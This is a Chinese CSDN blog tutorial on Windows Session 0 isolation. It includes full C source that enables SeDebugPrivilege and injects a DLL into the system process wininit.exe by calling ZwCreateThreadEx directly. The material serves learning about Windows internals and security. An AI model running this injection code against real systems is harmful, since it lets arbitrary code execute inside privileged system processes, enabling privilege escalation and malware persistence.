Windows服务之突破会话隔离——远线程注入

最新推荐文章于 2022-05-04 21:23:52 发布
最新推荐文章于 2022-05-04 21:23:52 发布
阅读量868 收藏 2
点赞数 1
分类专栏: C++编程 文章标签: Session 0 会话隔离 远线程注入 Windows服务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sxr__nc/article/details/115656676
版权

Windows服务第二话,会话隔离,关于服务不得不提的就是会话隔离机制了。服务作为一个特殊的应用程序,随着系统的开启和关闭而开始停止工作,部分情况下可能存在部分服务需要用户手动开启(一般都是用户自己自定义的服务)。
在早期的Windows操作系统中,Windows 服务在后台执行着各种各样任务,支持着我们日常的桌面操作。有时候可能需要服务与用户进行信息或界面交互操作。这个时候系统的服务以及应用程序是运行在同一个会话空间的,但是这个时候会存在较大的安全隐患。因为服务在运行的时候是提升权限进行运行的,但是大部分应用程序在运行的时候是没有相应的高级权限,这样在同一个会话空间的时候,服务程序所拥有的高级权限就会成为大部分黑客所趋之若鹜的对象。
所以在Windows Vista之后,对这个问题进行了安全限制。在Windows Vista系统之后,在用户登录的时候,系统服务和用户的应用程序分别运行在会话0和会话1。而且会话0和会话1之间是不能进行信息和界面交互操作的,这一点也可以在我们进行远线程注入的时候无法成功注入到服务进程中得到结论。
图示化:
早期Windows版本的会话机制:用户1在登录的时候,应用程序和服务运行在同一个会话空间里边,用户2在登录的时候,应用程序会运行在会话1中,系统服务是共用的。
在这里插入图片描述

Vista之后的操作系统版本:用户1在登录的时候,系统服务运行在会话空间0(Session 0)中,应用程序运行在会话空间1中(Session 1)。用户2登录的时候,应用程序运行在会话空间2中,系统服务同样也是共用的。
在这里插入图片描述

可以通过procexp来查看服务和应用程序所运行的会话空间

Windows服务之,穿透Session执行线程注入
采用常规的手段对Session 0服务的进程实现注入操作的时候,会注入失败,"罪魁祸首"就是Windows操作系统的点会话隔离机制。该机制使得其创建一个进程之后并不会立即运行,而是先挂起进程,在查看要运行的进程所在的会话层之后再决定是否恢复进程运行。在使用CreateRemoteThread执行远线程创建的时候,会调用底层函数ZwCreateThreadEx函数执行创建远程线程,在进行服务进程的注入的时候,ZwCreatedThreadEx的参数CreateSuspended(也就是CreatedThread标志位)一直为1,这也就直接导致注入的线程一直处于挂起状态,无法运行。

#include<stdio.h>
#include<Windows.h>
#include<Tlhelp32.h>
#define DestProc "wininit.exe"  //要注入的Session 0的进程
#define MyDLL "C:\\Users\\Administrator\\Desktop\\mydll.dll"             //注入的DLL文件的路径
BOOL RrightRaise(HANDLE hProcess, const char *DestPower)
{
	HANDLE hToken = NULL;
	LUID luidValue = { 0 };
	TOKEN_PRIVILEGES tokenPrivileges = { 0 };
	BOOL bRet = FALSE;
	DWORD dwRet = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
	printf("%d", GetLastError());
	if (false == dwRet)
	{
		return FALSE;
	}
	bRet = LookupPrivilegeValue(NULL, (LPCSTR)DestPower, &luidValue);//获取特权值LUID
	if (false == bRet)
	{
		return FALSE;
	}
	tokenPrivileges.PrivilegeCount = 1;
	tokenPrivileges.Privileges[0].Luid = luidValue;
	tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, NULL, NULL);
	if (false == bRet)
	{
		return FALSE;
	}
	dwRet = GetLastError();
	if (ERROR_SUCCESS == dwRet)
	{
		printf("SUCCESS!!");
	}
}
BOOL GetProcessIDByName(char *name, PDWORD pid)
{
	PROCESSENTRY32 pe32 = { 0 };
	pe32.dwSize = sizeof(PROCESSENTRY32);
	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);//拍进程快照
	if (INVALID_HANDLE_VALUE == hProcessSnap)
	{
		printf("CreateToolhelp32Snapshot Error :%d", GetLastError());
	}
	BOOL Ret = Process32First(hProcessSnap, &pe32);//枚举快照
	while (Ret)
	{
		if (!strcmp((char*)pe32.szExeFile, name))
		{
			*pid = pe32.th32ProcessID;
		}
		Ret = Process32Next(hProcessSnap, &pe32);//下一进程信息
	}
	return TRUE;
}
int main()
{
	//基本思路:服务运行在高权限,因此在注入之前需要先提权,获取相应的权限
	//获取要注入的目标进程的PID
	//执行注入操作
	//执行注入操作使用函数ZwCreateRemoteThreadEx
	//首先提权:
	HANDLE hProcess = GetCurrentProcess();
	DWORD pid;
	const char* DestPower = "SeDebugPrivilege";
	RrightRaise(hProcess, DestPower);
	//提权之后,匹配要注入的进程的PID,做进程遍历
	BOOL bRet = GetProcessIDByName((char *)DestProc, &pid);
	//打开目标进程句柄
	HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS, NULL, pid);//打开进程句柄
	if (!hand)
		return 0;
	//申请空间,分配相应的权限
	LPVOID lpaddress = VirtualAllocEx(hand, NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!lpaddress)
		return 0;
	//向申请的内存空间写入数据
	bool write = WriteProcessMemory(hand, lpaddress, MyDLL, strlen(MyDLL), NULL);
	if (!write)
		return 0;
	//加载ntdll.dll
	HMODULE hNtdll = LoadLibrary("ntdll.dll");
	if (NULL == hNtdll)
	{
		printf("加载ntdll.dll失败!");
		CloseHandle(hProcess);
		return FALSE;
	}
	//获取LoadLibrary函数的地址
	FARPROC pFuncProcAddr = GetProcAddress(GetModuleHandle((LPCSTR)"kernel32.dll"), "LoadLibraryA");
	if (NULL == pFuncProcAddr)
	{
		printf("获取LoadLibrary函数地址失败!");
		CloseHandle(hProcess);
		return FALSE;
	}
	//获取目标函数地址ZwCreateThreadEx
#ifdef _WIN64
	typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
		PHANDLE ThreadHandle,
		ACCESS_MASK DesiredAccess,
		LPVOID ObjectAttributes,
		HANDLE ProcessHandle,
		LPTHREAD_START_ROUTINE lpStartAddress,
		LPVOID lpParameter,
		ULONG CreateThreadFlags,
		SIZE_T ZeroBits,
		SIZE_T StackSize,
		SIZE_T MaximumStackSize,
		LPVOID pUnkown
		);
#else
	typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
		PHANDLE ThreadHandle,
		ACCESS_MASK DesiredAccess,
		LPVOID ObjectAttributes,
		HANDLE ProcessHandle,
		LPTHREAD_START_ROUTINE lpStartAddress,
		LPVOID lpParameter,
		BOOL CreateSuspended,
		DWORD dwStackSize,
		DWORD dw1,
		DWORD dw2,
		LPVOID pUnkown
		);
#endif 
	typedef_ZwCreateThreadEx ZwCreateThreadEx =
		(typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");
	if (NULL == ZwCreateThreadEx)
	{
		printf("获取ZwCreateThreadEx函数地址失败!");
		CloseHandle(hProcess);
		return FALSE;
	}
	HANDLE hRemoteThread = NULL;
	DWORD dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hand,
		(LPTHREAD_START_ROUTINE)pFuncProcAddr, lpaddress, 0, 0, 0, 0, NULL);
	if (NULL == hRemoteThread)
	{
		printf("目标进程中创建线程失败!");
		CloseHandle(hProcess);
		system("PAUSE");
		return FALSE;
	}
	system("pause");
	return TRUE;
}

运行结果:
在这里插入图片描述

Psy_Hacker
关注
专栏目录
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、线程钩子、突破Session 0注入、APC注入
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、线程钩子、突破SESSION 0隔离线程注入、APC注入,案例包括键盘钩子、计算器线程注入实现、APC注入等,希望对您有所帮助。
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
线程注入
qq_40710190的博客
05-04 647
线程注入 线程注入是最基础的一种注入方式,因为其调用了CreateRemoteThread()函数而得名。但是因为其是最基础的注入方式,调用了windows API而特征明显,所以非常容易被检测出来。 这次的实验对象是notepad.exe #include <Windows.h> #include <stdio.h> #include <TlHelp32.h> #include <iostream> using namespace std; BOO
EJB——会话bean(二)
徐凤竹 程序人生
07-31 1420
为什么使用会话bean 1.并发和线程安全        构造服务器端应用程序的重点在于可以是客户端同时共享,会话bean用于处理客户端请求,他们支持高并发。容器利用很多技术“自动”确保你不必担心并发和线程安全方面的问题。 2.程处理Web服务        会话bean支持基于Java程方法调用的本地访问和基于简单对象访问协议(Simp
Windows黑客编程技术》—— 学习历程
A22B9S的博客
06-27 977
第一章 开发环境 开发环境采用VS 2017,主要讲的一些配置方面的问题,比如控制台程序和DLL程序的编译设置(兼容性设置,运行库),MFC程序编译设置。 Debug模式和Release模式 Debug通常被称为调试版本,而Release通常称为发布版本。Debug模式和Release模式唯一的区别就是在VS开发环境里编译选项的区别。假如在Debug模式下运行正常,代码肯定是没问题的,而在Rel...
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
windows-CODE注入线程注入
08-14
windows-CODE注入线程注入) 整理代码
复习笔记4_数据结构线性表(习题)
weixin_43700565的博客
04-16 299
1、顺序表删除:删除第i个元素,并返回删除值 2、顺序表求最值(最大,最小) 3、顺序表查找第i个元素 4、顺序表查找e位于第几个元素 5、链表建立1~10个元素:头插法 6、链表建立1~10个元素:尾插法 7、链表新增:在第i个位置插入元素e 8、链表删除:删除第i个元素,并返回删除值 9、链表删除:删除所有指定元素e
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值